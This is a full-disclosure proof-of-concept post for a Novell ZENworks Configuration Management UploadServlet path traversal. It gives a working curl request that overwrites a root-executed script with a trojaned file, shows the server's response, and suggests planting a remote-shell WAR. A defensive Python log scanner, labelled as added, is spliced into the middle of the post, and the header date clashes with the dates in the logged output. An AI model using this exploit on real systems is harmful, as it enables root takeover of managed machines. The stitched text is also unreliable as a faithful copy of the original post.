# Exploit Title: ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability
# Date: 2009-04-26
# Author: tucanalamigo http://tucanalamigo.blogspot.com
# Software Link: http://www.novell.com/products/zenworks/configurationmanagement/
# Version: 10.2
# Tested on: GNU/Linux (SLES11)

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

You can overwrite any file owned by the zenworks user (nearly all of /opt/novell), such as /opt/novell/zenworks/bin/daemon-monitor, a shell script executed by the Novell ZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and "of course" running as root...

$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworks zenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`

echo $SERVICES
echo $SLEEPTIME

if [ -z "$SERVICES" ]; then
    echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
    exit 1
fi

if [ -z "$SLEEPTIME" ]; then
    SLEEPTIME=10
fi

while [ 1 ]; do
    sleep $SLEEPTIME
    for SRV in $SERVICES; do
        /etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
        ( date ; id ) >> /tmp/monitor.log 2>&1
    done
done
$

You can replace /opt/novell/zenworks/bin/jsvc (the Java Virtual Machine launcher), upload a new remoteshell.war to /opt/novell/zenworks/share/tomcat/webapps, or use your imagination to take control of all machines managed by ZCM.
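Added defensive example, not part of the original post: a Python scanner for Tomcat/Apache access logs that flags requests to /zenworks-fileupload/ whose decoded type or filename parameter carries a ".." segment or resolves outside the upload directory, alongside the path-containment check the servlet itself should perform before writing. UPLOAD_ROOT, the log format and the sample log lines are assumptions; the advisory does not state where the servlet writes by default.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs

# Assumed upload base directory (placeholder): the advisory does not say where the servlet writes.
UPLOAD_ROOT = "/opt/novell/zenworks/share/tomcat/temp/zenworks-fileupload"
# Apache/Tomcat common log format: client ident user [timestamp] "request line" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')


def resolve_upload_target(type_param, filename, root=UPLOAD_ROOT):
    """Containment check the servlet should apply before writing: join root/type/filename,
    collapse '.' and '..', and require the result to stay inside root -> (path, contained)."""
    normalized = posixpath.normpath(posixpath.join(root, type_param, filename))
    return normalized, normalized.startswith(root + "/")


def has_dotdot(value):
    """True if any path segment of the (already URL-decoded) value is '..'."""
    return any(seg == ".." for seg in value.split("/"))


def flag_upload_requests(log_lines):
    """Flag /zenworks-fileupload/ requests whose decoded 'type' or 'filename' carries '..' or
    resolves outside the upload root; a legitimate 'type' is a MIME type, so '..' never belongs."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.startswith("/zenworks-fileupload"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes the values
        type_param = params.get("type", [""])[0]
        filename = params.get("filename", [""])[0]
        target, contained = resolve_upload_target(type_param, filename)
        reasons = []
        if has_dotdot(type_param) or has_dotdot(filename):
            reasons.append("dot-dot segment")
        if not contained:
            reasons.append("escapes upload root")
        if reasons:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"), "status": m.group("status"),
                             "resolved": target, "reasons": reasons})
    return findings


# Constructed sample log lines (not from the advisory); the first mirrors the PoC request.
SAMPLE_LOG = [
    '127.11.22.33 - - [26/Apr/2010:21:58:05 +0000] "POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1" 200 0',
    '10.0.0.5 - - [26/Apr/2010:22:01:11 +0000] "POST /zenworks-fileupload/?type=application/octet-stream&filename=agent.msi HTTP/1.1" 200 0',
    '10.0.0.6 - - [26/Apr/2010:22:02:30 +0000] "POST /zenworks-fileupload/?type=application%2Foctet-stream%2F..%2F..%2Fetc&filename=x HTTP/1.1" 200 0',
]
```

The third sample shows why the ".." check is kept separate from containment: a short traversal that lands back inside the root passes the containment test but is still never a legitimate MIME type.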
PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):

$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
* About to connect() to zcm.server port 80 (#0)
*   Trying 127.11.22.33... connected
* Connected to zcm.server (127.11.22.33) port 80 (#0)
> POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.2
> Host: zcm.server
> Accept: */*
> Content-Type: application/octet-stream
> Content-Length: 554
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
Server: Apache-Coyote/1.1
< Content-Length: 0
Content-Length: 0
< Date: Mon, 26 Apr 2010 21:58:05 GMT
Date: Mon, 26 Apr 2010 21:58:05 GMT
<
* Connection #0 to host zcm.server left intact
* Closing connection #0
$

--
Greetings from #linux, your friendly channel.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/